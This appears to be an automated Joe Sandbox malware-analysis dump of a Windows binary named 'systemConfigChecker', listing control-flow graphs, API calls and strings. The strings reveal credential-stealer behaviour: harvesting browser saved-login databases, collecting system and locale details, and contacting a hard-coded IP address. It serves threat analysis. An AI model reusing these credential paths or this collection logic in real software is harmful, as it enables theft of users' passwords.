7ff64e13b500 699->702 703 7ff64e136690-7ff64e1366a3 699->703 710 7ff64e1366ea-7ff64e1366f2 700->710 701->552 704 7ff64e136759-7ff64e13676c 701->704 702->700 703->702 707 7ff64e1366a5-7ff64e1366ab _invalid_parameter_noinfo_noreturn 703->707 704->548 704->552 707->702 710->698 711 7ff64e1366f4-7ff64e136715 call 7ff64e13a1c0 710->711 711->692 714 7ff64e136717-7ff64e13672a 711->714 714->688 714->692
              APIs
              • GetConsoleWindow.KERNELBASE ref: 00007FF64E135DC1
              • ShowWindow.USER32 ref: 00007FF64E135DCF
                • Part of subcall function 00007FF64E139610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF64E131CCF), ref: 00007FF64E139656
                • Part of subcall function 00007FF64E134A40: memset.VCRUNTIME140(?), ref: 00007FF64E134A96
                • Part of subcall function 00007FF64E134A40: memset.VCRUNTIME140(?), ref: 00007FF64E134AAA
                • Part of subcall function 00007FF64E134A40: memset.VCRUNTIME140(?), ref: 00007FF64E134ABE
                • Part of subcall function 00007FF64E134A40: memset.VCRUNTIME140(?), ref: 00007FF64E134AD2
                • Part of subcall function 00007FF64E134A40: memset.VCRUNTIME140(?), ref: 00007FF64E134AE3
                • Part of subcall function 00007FF64E134A40: RegOpenKeyExA.KERNELBASE(?), ref: 00007FF64E134B13
                • Part of subcall function 00007FF64E134A40: RegGetValueA.KERNELBASE ref: 00007FF64E134B4C
                • Part of subcall function 00007FF64E134A40: RegCloseKey.KERNELBASE ref: 00007FF64E134B89
                • Part of subcall function 00007FF64E134A40: RegOpenKeyExA.KERNELBASE ref: 00007FF64E134BB8
                • Part of subcall function 00007FF64E134A40: RegGetValueA.KERNELBASE ref: 00007FF64E134BF1
                • Part of subcall function 00007FF64E1383C0: memcpy.VCRUNTIME140 ref: 00007FF64E138417
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E135E4F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E135EBD
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E135F2B
              • GlobalMemoryStatusEx.KERNELBASE ref: 00007FF64E135F5A
              • memset.VCRUNTIME140 ref: 00007FF64E135F6C
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF64E135F9A
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E13607C
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E136089
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13613E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1361AC
              • memcpy.VCRUNTIME140 ref: 00007FF64E1362B9
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E136340
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13637F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1363ED
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13645B
                • Part of subcall function 00007FF64E13B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1364B3
              • memset.VCRUNTIME140 ref: 00007FF64E1364CB
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • GetModuleFileNameA.KERNEL32 ref: 00007FF64E1364E9
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
                • Part of subcall function 00007FF64E1399F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
                • Part of subcall function 00007FF64E1399F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
                • Part of subcall function 00007FF64E1399F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
                • Part of subcall function 00007FF64E1399F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139AE6
                • Part of subcall function 00007FF64E1399F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B0F
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B36
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E1365E3
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E1365F0
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1366A5
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13672C
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13676E
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1367C0
                • Part of subcall function 00007FF64E131310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF64E13131B
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E136804
                • Part of subcall function 00007FF64E131270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF64E13B543), ref: 00007FF64E1312B4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memset$U?$char_traits@_W@std@@@std@@memcpy$??1?$basic_ios@??1?$basic_iostream@?good@ios_base@std@@?sputc@?$basic_streambuf@OpenValueWindow$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseConcurrency::cancel_current_taskConsoleD@std@@@1@@FileGlobalMemoryModuleNameOsfx@?$basic_ostream@_ShowStatusV01@_V12@V?$basic_streambuf@Xlength_error@std@@__std_exception_copymalloc
              • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Executable Path: $MACHINE INFO:$Total Physical Memory:
              • API String ID: 2962708308-876331821
              • Opcode ID: e5511262a6129d48db9be39874ea1247c3cecd71c9e2c9411d20e8d38b17ac28
              • Instruction ID: 0da10e5589681210b164551de4105bca7f9441d933742fee96e6df1024792b72
              • Opcode Fuzzy Hash: e5511262a6129d48db9be39874ea1247c3cecd71c9e2c9411d20e8d38b17ac28
              • Instruction Fuzzy Hash: 9652AFA2F5CA8685FA10FB64D4403ED2361BB657A4F505632FA6D97EDADF2CD480CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 715 7ff64e135510-7ff64e13555e malloc 716 7ff64e135570-7ff64e1355d4 GetEnvironmentVariableW call 7ff64e138280 free call 7ff64e139e30 call 7ff64e1350e0 715->716 717 7ff64e135560-7ff64e13556b 715->717 727 7ff64e1355d6-7ff64e1355ed 716->727 728 7ff64e135610-7ff64e13564c call 7ff64e139e30 call 7ff64e1350e0 716->728 718 7ff64e135d4b-7ff64e135d79 call 7ff64e13b4e0 717->718 730 7ff64e13560b call 7ff64e13b500 727->730 731 7ff64e1355ef-7ff64e135602 727->731 736 7ff64e135651-7ff64e13565d 728->736 730->728 731->730 733 7ff64e135604-7ff64e13560a _invalid_parameter_noinfo_noreturn 731->733 733->730 737 7ff64e13569b-7ff64e1357f3 call 7ff64e139e30 * 8 call 7ff64e1390c0 call 7ff64e139e30 call 7ff64e13ac60 736->737 738 7ff64e13565f-7ff64e135678 736->738 765 7ff64e135830-7ff64e13584a call 7ff64e13a9d0 737->765 766 7ff64e1357f5-7ff64e13582e memcpy 737->766 739 7ff64e135696 call 7ff64e13b500 738->739 740 7ff64e13567a-7ff64e13568d 738->740 739->737 740->739 742 7ff64e13568f-7ff64e135695 _invalid_parameter_noinfo_noreturn 740->742 742->739 767 7ff64e13584f-7ff64e1358f2 call 7ff64e1390c0 call 7ff64e139e30 call 7ff64e13ac60 765->767 766->767 775 7ff64e13592f-7ff64e135949 call 7ff64e13a9d0 767->775 776 7ff64e1358f4-7ff64e13592d memcpy 767->776 777 7ff64e13594e-7ff64e1359f9 call 7ff64e13b508 775->777 776->777 781 7ff64e135a00-7ff64e135a24 call 7ff64e1394e0 777->781 784 7ff64e135a26-7ff64e135a5d call 7ff64e13a1c0 call 7ff64e13b544 781->784 789 7ff64e135a99-7ff64e135aad 784->789 790 7ff64e135a5f-7ff64e135a76 784->790 793 7ff64e135ae8-7ff64e135afa 789->793 794 7ff64e135aaf-7ff64e135ac5 789->794 791 7ff64e135a78-7ff64e135a8b 790->791 792 7ff64e135a94 call 7ff64e13b500 790->792 791->792 797 7ff64e135a8d-7ff64e135a93 _invalid_parameter_noinfo_noreturn 791->797 792->789 795 7ff64e135b36-7ff64e135b3f 793->795 796 7ff64e135afc-7ff64e135b12 793->796 799 7ff64e135ac7-7ff64e135ada 794->799 800 7ff64e135ae3 call 7ff64e13b500 794->800 805 7ff64e135b7b-7ff64e135b8f 795->805 806 7ff64e135b41-7ff64e135b58 795->806 803 7ff64e135b30-7ff64e135b35 call 7ff64e13b500 796->803 804 7ff64e135b14-7ff64e135b27 796->804 797->792 799->800 801 7ff64e135adc-7ff64e135ae2 _invalid_parameter_noinfo_noreturn 799->801 800->793 801->800 803->795 804->803 809 7ff64e135b29-7ff64e135b2f _invalid_parameter_noinfo_noreturn 804->809 807 7ff64e135bca-7ff64e135bdc 805->807 808 7ff64e135b91-7ff64e135ba7 805->808 811 7ff64e135b76 call 7ff64e13b500 806->811 812 7ff64e135b5a-7ff64e135b6d 806->812 815 7ff64e135c17-7ff64e135c57 807->815 816 7ff64e135bde-7ff64e135bf4 807->816 813 7ff64e135ba9-7ff64e135bbc 808->813 814 7ff64e135bc5 call 7ff64e13b500 808->814 809->803 811->805 812->811 818 7ff64e135b6f-7ff64e135b75 _invalid_parameter_noinfo_noreturn 812->818 813->814 820 7ff64e135bbe-7ff64e135bc4 _invalid_parameter_noinfo_noreturn 813->820 814->807 824 7ff64e135c59-7ff64e135c6d 815->824 825 7ff64e135c90-7ff64e135cb2 815->825 822 7ff64e135bf6-7ff64e135c09 816->822 823 7ff64e135c12 call 7ff64e13b500 816->823 818->811 820->814 822->823 828 7ff64e135c0b-7ff64e135c11 _invalid_parameter_noinfo_noreturn 822->828 823->815 830 7ff64e135c8b call 7ff64e13b500 824->830 831 7ff64e135c6f-7ff64e135c82 824->831 826 7ff64e135cb4-7ff64e135cc8 825->826 827 7ff64e135cf3-7ff64e135d0d 825->827 833 7ff64e135ce6-7ff64e135ceb call 7ff64e13b500 826->833 834 7ff64e135cca-7ff64e135cdd 826->834 827->718 835 7ff64e135d0f-7ff64e135d28 827->835 828->823 830->825 831->830 836 7ff64e135c84-7ff64e135c8a _invalid_parameter_noinfo_noreturn 831->836 833->827 834->833 837 7ff64e135cdf-7ff64e135ce5 _invalid_parameter_noinfo_noreturn 834->837 839 7ff64e135d46 call 7ff64e13b500 835->839 840 7ff64e135d2a-7ff64e135d3d 835->840 836->830 837->833 839->718 840->839 842 7ff64e135d3f-7ff64e135d45 _invalid_parameter_noinfo_noreturn 840->842 842->839
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
              • String ID: ?????? ??????: $USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$defa$rele$rele
              • API String ID: 716798019-1786275549
              • Opcode ID: cf1a96ae52e39750a6f6db40f34a451b3bf87bc4091000d337629dce12d692df
              • Instruction ID: a0902079f52e72da792930a7c20afb7bf110b062a3cac1070652e9d9ff4743c7
              • Opcode Fuzzy Hash: cf1a96ae52e39750a6f6db40f34a451b3bf87bc4091000d337629dce12d692df
              • Instruction Fuzzy Hash: A9327DB2A58BC695FB20BF24D8443ED2321FB95794F405232EA5D57EA9EF38D680C700

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 844 7ff64e134a40-7ff64e134b1b call 7ff64e13c530 memset * 5 call 7ff64e136810 RegOpenKeyExA 849 7ff64e134b97-7ff64e134bc0 RegOpenKeyExA 844->849 850 7ff64e134b1d-7ff64e134b54 RegGetValueA 844->850 853 7ff64e134c3c-7ff64e134c65 RegOpenKeyExA 849->853 854 7ff64e134bc2-7ff64e134bf9 RegGetValueA 849->854 851 7ff64e134b56-7ff64e134b7f call 7ff64e1399f0 * 3 850->851 852 7ff64e134b84-7ff64e134b8f RegCloseKey 850->852 851->852 852->849 856 7ff64e134d4c-7ff64e134d78 853->856 857 7ff64e134c6b-7ff64e134ca2 RegGetValueA 853->857 858 7ff64e134c29-7ff64e134c34 RegCloseKey 854->858 859 7ff64e134bfb-7ff64e134c24 call 7ff64e1399f0 * 3 854->859 860 7ff64e134d7a-7ff64e134d84 856->860 861 7ff64e134d9b-7ff64e134d9e 856->861 863 7ff64e134ca4-7ff64e134ccd call 7ff64e1399f0 * 3 857->863 864 7ff64e134cd2-7ff64e134d09 RegGetValueA 857->864 858->853 859->858 860->861 866 7ff64e134d86-7ff64e134d99 860->866 869 7ff64e134da0-7ff64e134daa 861->869 870 7ff64e134dc2-7ff64e134dc7 861->870 863->864 871 7ff64e134d39-7ff64e134d44 RegCloseKey 864->871 872 7ff64e134d0b-7ff64e134d34 call 7ff64e1399f0 * 3 864->872 874 7ff64e134dcc-7ff64e134dcf 866->874 869->870 877 7ff64e134dac-7ff64e134dc0 869->877 870->874 871->856 872->871 882 7ff64e134dda-7ff64e134e45 call 7ff64e137c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff64e13b4e0 874->882 883 7ff64e134dd1-7ff64e134dd9 call 7ff64e1396c0 874->883 877->874 883->882
              APIs
              • memset.VCRUNTIME140(?), ref: 00007FF64E134A96
              • memset.VCRUNTIME140(?), ref: 00007FF64E134AAA
              • memset.VCRUNTIME140(?), ref: 00007FF64E134ABE
              • memset.VCRUNTIME140(?), ref: 00007FF64E134AD2
              • memset.VCRUNTIME140(?), ref: 00007FF64E134AE3
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF64E134B13
              • RegGetValueA.KERNELBASE ref: 00007FF64E134B4C
              • RegCloseKey.KERNELBASE ref: 00007FF64E134B89
              • RegOpenKeyExA.KERNELBASE ref: 00007FF64E134BB8
              • RegGetValueA.KERNELBASE ref: 00007FF64E134BF1
              • RegCloseKey.ADVAPI32 ref: 00007FF64E134C2E
              • RegOpenKeyExA.KERNELBASE ref: 00007FF64E134C5D
              • RegGetValueA.KERNELBASE ref: 00007FF64E134C9A
              • RegGetValueA.KERNELBASE ref: 00007FF64E134D01
              • RegCloseKey.KERNELBASE ref: 00007FF64E134D3E
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E134E0F
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E134E19
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
                • Part of subcall function 00007FF64E1399F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
                • Part of subcall function 00007FF64E1399F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
                • Part of subcall function 00007FF64E1399F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
                • Part of subcall function 00007FF64E1399F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139AE6
                • Part of subcall function 00007FF64E1399F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B0F
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B36
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
              • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 20268565-1502927450
              • Opcode ID: 12b30c537c136771721c78f4a9f3bda910a894ae6b1a0a306b9aab14cf318f64
              • Instruction ID: 86c2ff07fe3b9f8b1b4faefaf3269a6910dbac7f4b9aa8564d25bb18fc5ea65d
              • Opcode Fuzzy Hash: 12b30c537c136771721c78f4a9f3bda910a894ae6b1a0a306b9aab14cf318f64
              • Instruction Fuzzy Hash: 36B12E72B5CB8185FB20FB25E8802E967A5FBA4784F404136EA8D87E69DF3CD545CB40

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
              • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
              • API String ID: 849217320-4095685055
              • Opcode ID: bb1e038c47dcd19b0d5ca6d5e52eb04ef700f44ac4d6c11cb81c477ed665ef84
              • Instruction ID: cf1c38941feeebdbd74712cf2baae8105bae62ba1c06ffd8ff9768c400c98fb5
              • Opcode Fuzzy Hash: bb1e038c47dcd19b0d5ca6d5e52eb04ef700f44ac4d6c11cb81c477ed665ef84
              • Instruction Fuzzy Hash: C8616E72A5C78182FA10FB25E44066E67A0FB99B84F144635FA8D87F64DF3DE4858F40

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 979 7ff64e134640-7ff64e1346a0 GetLocaleInfoA 980 7ff64e1346c7-7ff64e1346e2 979->980 981 7ff64e1346a2-7ff64e1346c2 call 7ff64e13a0c0 979->981 983 7ff64e1346e5-7ff64e1346ec 980->983 986 7ff64e134785-7ff64e1347af call 7ff64e13b4e0 981->986 983->983 985 7ff64e1346ee-7ff64e134722 call 7ff64e13a0c0 GetLocaleInfoA 983->985 991 7ff64e134728-7ff64e134751 call 7ff64e13a0c0 985->991 992 7ff64e1347b0-7ff64e1347bf 985->992 991->986 998 7ff64e134753-7ff64e134765 991->998 993 7ff64e1347c6-7ff64e1347cd 992->993 993->993 995 7ff64e1347cf-7ff64e134902 call 7ff64e13a0c0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff64e1399f0 call 7ff64e13b250 call 7ff64e1399f0 call 7ff64e13b250 call 7ff64e1399f0 993->995 1014 7ff64e134904-7ff64e13490e 995->1014 1015 7ff64e134925-7ff64e134928 995->1015 1000 7ff64e134767-7ff64e13477a 998->1000 1001 7ff64e134780 call 7ff64e13b500 998->1001 1000->1001 1003 7ff64e134a33-7ff64e134a39 _invalid_parameter_noinfo_noreturn 1000->1003 1001->986 1014->1015 1016 7ff64e134910-7ff64e134923 1014->1016 1017 7ff64e13494c-7ff64e134951 1015->1017 1018 7ff64e13492a-7ff64e134934 1015->1018 1019 7ff64e134956-7ff64e134959 1016->1019 1017->1019 1018->1017 1020 7ff64e134936-7ff64e13494a 1018->1020 1021 7ff64e13495b-7ff64e134963 call 7ff64e1396c0 1019->1021 1022 7ff64e134964-7ff64e1349aa call 7ff64e137c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1019->1022 1020->1019 1021->1022 1027 7ff64e1349ac-7ff64e1349be 1022->1027 1028 7ff64e1349e1-7ff64e1349fc 1022->1028 1029 7ff64e1349dc call 7ff64e13b500 1027->1029 1030 7ff64e1349c0-7ff64e1349d3 1027->1030 1028->986 1031 7ff64e134a02-7ff64e134a14 1028->1031 1029->1028 1030->1029 1032 7ff64e1349d5-7ff64e1349db _invalid_parameter_noinfo_noreturn 1030->1032 1031->1001 1034 7ff64e134a1a-7ff64e134a2d 1031->1034 1032->1029 1034->1001 1034->1003
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
              • String ID: Country: $Failed to get locale$Language:
              • API String ID: 3095796567-568146128
              • Opcode ID: 7ee4630a8720dee31b7aac71eba83e50fa141e2ccc1ffe48e3eec228e7cdaa5d
              • Instruction ID: 9609b87a27c980b04e8b4c6779a7026ff7e2043edd07e33e34f62142cd4c4b81
              • Opcode Fuzzy Hash: 7ee4630a8720dee31b7aac71eba83e50fa141e2ccc1ffe48e3eec228e7cdaa5d
              • Instruction Fuzzy Hash: FDB19E72A58B8585FB10EF64E4803AD2761FB95B98F404232EA9D97F98DF38D185CB00

              Control-flow Graph

              • Executed
              • Not Executed
